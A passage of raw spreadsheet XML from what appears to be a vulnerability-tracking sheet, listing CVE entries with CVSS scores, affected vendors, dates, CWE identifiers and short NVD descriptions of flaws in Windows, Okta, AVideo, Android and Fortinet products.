t="inlineStr"><is><t>CWE-822</t></is></c><c r="S353" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T353" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t></is></c></row><row r="354"><c r="A354" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B354" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C354" s="5" t="inlineStr"><is><t>CVE-2026-78449</t></is></c><c r="D354" s="5" t="n"><v>8.1</v></c><c r="E354" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F354" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G354" s="5" t="inlineStr" /><c r="H354" s="5" t="n"><v>0.005</v></c><c r="I354" s="5" t="inlineStr" /><c r="J354" s="5" t="inlineStr" /><c r="K354" s="5" t="inlineStr" /><c r="L354" s="5" t="inlineStr" /><c r="M354" s="5" t="inlineStr" /><c r="N354" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O354" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P354" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q354" s="5" t="inlineStr" /><c r="R354" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S354" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T354" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t></is></c></row><row r="355"><c r="A355" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B355" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C355" s="5" t="inlineStr"><is><t>CVE-2026-78450</t></is></c><c r="D355" s="5" t="n"><v>8.1</v></c><c r="E355" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F355" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G355" s="5" t="inlineStr" /><c r="H355" s="5" t="n"><v>0.005</v></c><c r="I355" s="5" t="inlineStr" /><c r="J355" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K355" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L355" s="5" t="inlineStr" /><c r="M355" s="5" t="inlineStr" /><c r="N355" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O355" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P355" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q355" s="5" t="inlineStr" /><c r="R355" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S355" s="5" t="inlineStr"><is><t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T355" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t></is></c></row><row r="356"><c r="A356" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B356" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C356" s="5" t="inlineStr"><is><t>CVE-2026-78626</t></is></c><c r="D356" s="5" t="n"><v>8.1</v></c><c r="E356" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F356" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G356" s="5" t="inlineStr" /><c r="H356" s="5" t="n"><v>0.002</v></c><c r="I356" s="5" t="inlineStr" /><c r="J356" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K356" s="5" t="inlineStr" /><c r="L356" s="5" t="inlineStr" /><c r="M356" s="5" t="inlineStr" /><c r="N356" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O356" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P356" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q356" s="5" t="inlineStr" /><c r="R356" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S356" s="5" t="inlineStr"><is><t>The Okta Access Gateway improperly handles input sanitization and regular expression evaluation within its Protected Rule authorization check, resulting in an authorization bypass when an administrator has explicitly configured a Protected Rule policy on one or more application resources.</t></is></c><c r="T356" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t></is></c></row><row r="357"><c r="A357" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B357" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C357" s="5" t="inlineStr"><is><t>CVE-2026-82066</t></is></c><c r="D357" s="5" t="n"><v>8.1</v></c><c r="E357" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G357" s="5" t="inlineStr" /><c r="H357" s="5" t="n"><v>0.002</v></c><c r="I357" s="5" t="inlineStr" /><c r="J357" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K357" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L357" s="5" t="inlineStr" /><c r="M357" s="5" t="inlineStr" /><c r="N357" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O357" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P357" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q357" s="5" t="inlineStr" /><c r="R357" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S357" s="5" t="inlineStr"><is><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is></c><c r="T357" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t></is></c></row><row r="358"><c r="A358" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B358" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C358" s="5" t="inlineStr"><is><t>CVE-2026-83527</t></is></c><c r="D358" s="5" t="n"><v>8.1</v></c><c r="E358" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F358" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G358" s="5" t="inlineStr" /><c r="H358" s="5" t="n"><v>0.015</v></c><c r="I358" s="5" t="inlineStr" /><c r="J358" s="5" t="inlineStr" /><c r="K358" s="5" t="inlineStr" /><c r="L358" s="5" t="inlineStr" /><c r="M358" s="5" t="inlineStr" /><c r="N358" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O358" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P358" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q358" s="5" t="inlineStr" /><c r="R358" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S358" s="5" t="inlineStr"><is><t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t></is></c><c r="T358" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t></is></c></row><row r="359"><c r="A359" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B359" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C359" s="5" t="inlineStr"><is><t>CVE-2026-83997</t></is></c><c r="D359" s="5" t="n"><v>8.1</v></c><c r="E359" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F359" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G359" s="5" t="inlineStr" /><c r="H359" s="5" t="n"><v>0.005</v></c><c r="I359" s="5" t="inlineStr" /><c r="J359" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K359" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L359" s="5" t="inlineStr" /><c r="M359" s="5" t="inlineStr" /><c r="N359" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O359" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P359" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q359" s="5" t="inlineStr" /><c r="R359" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S359" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T359" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t></is></c></row><row r="360"><c r="A360" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B360" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C360" s="5" t="inlineStr"><is><t>CVE-2026-84393</t></is></c><c r="D360" s="5" t="n"><v>8.1</v></c><c r="E360" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F360" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G360" s="5" t="inlineStr" /><c r="H360" s="5" t="n"><v>0.002</v></c><c r="I360" s="5" t="inlineStr" /><c r="J360" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K360" s="5" t="inlineStr" /><c r="L360" s="5" t="inlineStr" /><c r="M360" s="5" t="inlineStr" /><c r="N360" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O360" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P360" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q360" s="5" t="inlineStr" /><c r="R360" s="5" t="inlineStr"><is><t>CWE-297</t></is></c><c r="S360" s="5" t="inlineStr"><is><t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t></is></c><c r="T360" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t></is></c></row><row r="361"><c r="A361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C361" s="5" t="inlineStr"><is><t>CVE-2026-86720</t></is></c><c r="D361" s="5" t="n"><v>8.1</v></c><c r="E361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G361" s="5" t="inlineStr" /><c r="H361" s="5" t="n"><v>0.003</v></c><c r="I361" s="5" t="inlineStr" /><c r="J361" s="5" t="inlineStr" /><c r="K361" s="5" t="inlineStr" /><c r="L361" s="5" t="inlineStr" /><c r="M361" s="5" t="inlineStr" /><c r="N361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q361" s="5" t="inlineStr" /><c r="R361" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S361" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t></is></c><c r="T361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t></is></c></row><row r="362"><c r="A362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C362" s="5" t="inlineStr"><is><t>CVE-2026-86723</t></is></c><c r="D362" s="5" t="n"><v>8.1</v></c><c r="E362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G362" s="5" t="inlineStr" /><c r="H362" s="5" t="n"><v>0.003</v></c><c r="I362" s="5" t="inlineStr" /><c r="J362" s="5" t="inlineStr" /><c r="K362" s="5" t="inlineStr" /><c r="L362" s="5" t="inlineStr" /><c r="M362" s="5" t="inlineStr" /><c r="N362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q362" s="5" t="inlineStr" /><c r="R362" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S362" s="5" t="inlineStr"><is><t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t></is></c><c r="T362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t></is></c></row><row r="363"><c r="A363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C363" s="5" t="inlineStr"><is><t>CVE-2026-28662</t></is></c><c r="D363" s="5" t="n"><v>8</v></c><c r="E363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F363" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G363" s="5" t="inlineStr" /><c r="H363" s="5" t="n"><v>0.001</v></c><c r="I363" s="5" t="inlineStr" /><c r="J363" s="5" t="inlineStr" /><c r="K363" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L363" s="5" t="inlineStr" /><c r="M363" s="5" t="inlineStr" /><c r="N363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P363" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q363" s="5" t="inlineStr" /><c r="R363" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S363" s="5" t="inlineStr"><is><t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t></is></c></row><row r="364"><c r="A364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C364" s="5" t="inlineStr"><is><t>CVE-2026-55277</t></is></c><c r="D364" s="5" t="n"><v>8</v></c><c r="E364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F364" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G364" s="5" t="inlineStr" /><c r="H364" s="5" t="n"><v>0.001</v></c><c r="I364" s="5" t="inlineStr" /><c r="J364" s="5" t="inlineStr" /><c r="K364" s="5" t="inlineStr" /><c r="L364" s="5" t="inlineStr" /><c r="M364" s="5" t="inlineStr" /><c r="N364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q364" s="5" t="inlineStr" /><c r="R364" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S364" s="5" t="inlineStr"><is><t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t></is></c></row><row r="365"><c r="A365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C365" s="5" t="inlineStr"><is><t>CVE-2026-68827</t></is></c><c r="D365" s="5" t="n"><v>8</v></c><c r="E365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F365" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G365" s="5" t="inlineStr" /><c r="H365" s="5" t="n"><v>0.004</v></c><c r="I365" s="5" t="inlineStr" /><c r="J365" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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65" s="5" t="inlineStr" /><c r="M365" s="5" t="inlineStr" /><c r="N365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P365" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q365" s="5" t="inlineStr" /><c r="R365" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S365" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t></is></c></row><row r="366"><c r="A366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C366" s="5" t="inlineStr"><is><t>CVE-2026-68834</t></is></c><c r="D366" s="5" t="n"><v>8</v></c><c r="E366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G366" s="5" t="inlineStr" /><c r="H366" s="5" t="n"><v>0.006</v></c><c r="I366" s="5" t="inlineStr" /><c r="J366" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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66" s="5" t="inlineStr" /><c r="M366" s="5" t="inlineStr" /><c r="N366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P366" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q366" s="5" t="inlineStr" /><c r="R366" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S366" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t></is></c></row><row r="367"><c r="A367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C367" s="5" t="inlineStr"><is><t>CVE-2026-68838</t></is></c><c r="D367" s="5" t="n"><v>8</v></c><c r="E367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G367" s="5" t="inlineStr" /><c r="H367" s="5" t="n"><v>0.004</v></c><c r="I367" s="5" t="inlineStr" /><c r="J367" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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67" s="5" t="inlineStr" /><c r="M367" s="5" t="inlineStr" /><c r="N367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P367" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q367" s="5" t="inlineStr" /><c r="R367" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S367" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t></is></c></row><row r="368"><c r="A368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C368" s="5" t="inlineStr"><is><t>CVE-2026-68876</t></is></c><c r="D368" s="5" t="n"><v>8</v></c><c r="E368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G368" s="5" t="inlineStr" /><c r="H368" s="5" t="n"><v>0.007</v></c><c r="I368" s="5" t="inlineStr" /><c r="J368" s="5" t="inlineStr" /><c r="K368" s="5" t="inlineStr" /><c r="L368" s="5" t="inlineStr" /><c r="M368" s="5" t="inlineStr" /><c r="N368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P368" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q368" s="5" t="inlineStr" /><c r="R368" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S368" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t></is></c></row><row r="369"><c r="A369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C369" s="5" t="inlineStr"><is><t>CVE-2026-68878</t></is></c><c r="D369" s="5" t="n"><v>8</v></c><c r="E369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G369" s="5" t="inlineStr" /><c r="H369" s="5" t="n"><v>0.005</v></c><c r="I369" s="5" t="inlineStr" /><c r="J369" s="5" t="inlineStr" /><c r="K369" s="5" t="inlineStr" /><c r="L369" s="5" t="inlineStr" /><c r="M369" s="5" t="inlineStr" /><c r="N369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P369" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q369" s="5" t="inlineStr" /><c r="R369" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S369" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t></is></c></row><row r="370"><c r="A370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C370" s="5" t="inlineStr"><is><t>CVE-2026-68880</t></is></c><c r="D370" s="5" t="n"><v>8</v></c><c r="E370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F370" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G370" s="5" t="inlineStr" /><c r="H370" s="5" t="n"><v>0.004</v></c><c r="I370" s="5" t="inlineStr" /><c r="J370" s="5" t="inlineStr" /><c r="K370" s="5" t="inlineStr" /><c r="L370" s="5" t="inlineStr" /><c r="M370" s="5" t="inlineStr" /><c r="N370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P370" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q370" s="5" t="inlineStr" /><c r="R370" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S370" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t></is></c></row><row r="371"><c r="A371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C371" s="5" t="inlineStr"><is><t>CVE-2026-68894</t></is></c><c r="D371" s="5" t="n"><v>8</v></c><c r="E371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G371" s="5" t="inlineStr" /><c r="H371" s="5" t="n"><v>0.006</v></c><c r="I371" s="5" t="inlineStr" /><c r="J371" s="5" t="inlineStr" /><c r="K371" s="5" t="inlineStr" /><c r="L371" s="5" t="inlineStr" /><c r="M371" s="5" t="inlineStr" /><c r="N371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P371" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q371" s="5" t="inlineStr" /><c r="R371" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S371" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t></is></c></row><row r="372"><c r="A372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C372" s="5" t="inlineStr"><is><t>CVE-2026-69271</t></is></c><c r="D372" s="5" t="n"><v>8</v></c><c r="E372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G372" s="5" t="inlineStr" /><c r="H372" s="5" t="n"><v>0.007</v></c><c r="I372" s="5" t="inlineStr" /><c r="J372" s="5" t="inlineStr" /><c r="K372" s="5" t="inlineStr" /><c r="L372" s="5" t="inlineStr" /><c r="M372" s="5" t="inlineStr" /><c r="N372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q372" s="5" t="inlineStr" /><c r="R372" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S372" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t></is></c></row><row r="373"><c r="A373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C373" s="5" t="inlineStr"><is><t>CVE-2026-69301</t></is></c><c r="D373" s="5" t="n"><v>8</v></c><c r="E373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G373" s="5" t="inlineStr" /><c r="H373" s="5" t="n"><v>0.008</v></c><c r="I373" s="5" t="inlineStr" /><c r="J373" s="5" t="inlineStr" /><c r="K373" s="5" t="inlineStr" /><c r="L373" s="5" t="inlineStr" /><c r="M373" s="5" t="inlineStr" /><c r="N373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P373" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q373" s="5" t="inlineStr" /><c r="R373" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S373" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t></is></c></row><row r="374"><c r="A374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C374" s="5" t="inlineStr"><is><t>CVE-2026-69322</t></is></c><c r="D374" s="5" t="n"><v>8</v></c><c r="E374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G374" s="5" t="inlineStr" /><c r="H374" s="5" t="n"><v>0.007</v></c><c r="I374" s="5" t="inlineStr" /><c r="J374" s="5" t="inlineStr" /><c r="K374" s="5" t="inlineStr" /><c r="L374" s="5" t="inlineStr" /><c r="M374" s="5" t="inlineStr" /><c r="N374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P374" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q374" s="5" t="inlineStr" /><c r="R374" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S374" s="5" t="inlineStr"><is><t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t></is></c></row><row r="375"><c r="A375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C375" s="5" t="inlineStr"><is><t>CVE-2026-69332</t></is></c><c r="D375" s="5" t="n"><v>8</v></c><c r="E375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G375" s="5" t="inlineStr" /><c r="H375" s="5" t="n"><v>0.007</v></c><c r="I375" s="5" t="inlineStr" /><c r="J375" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K37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75" s="5" t="inlineStr" /><c r="M375" s="5" t="inlineStr" /><c r="N375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P375" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q375" s="5" t="inlineStr" /><c r="R375" s="5" 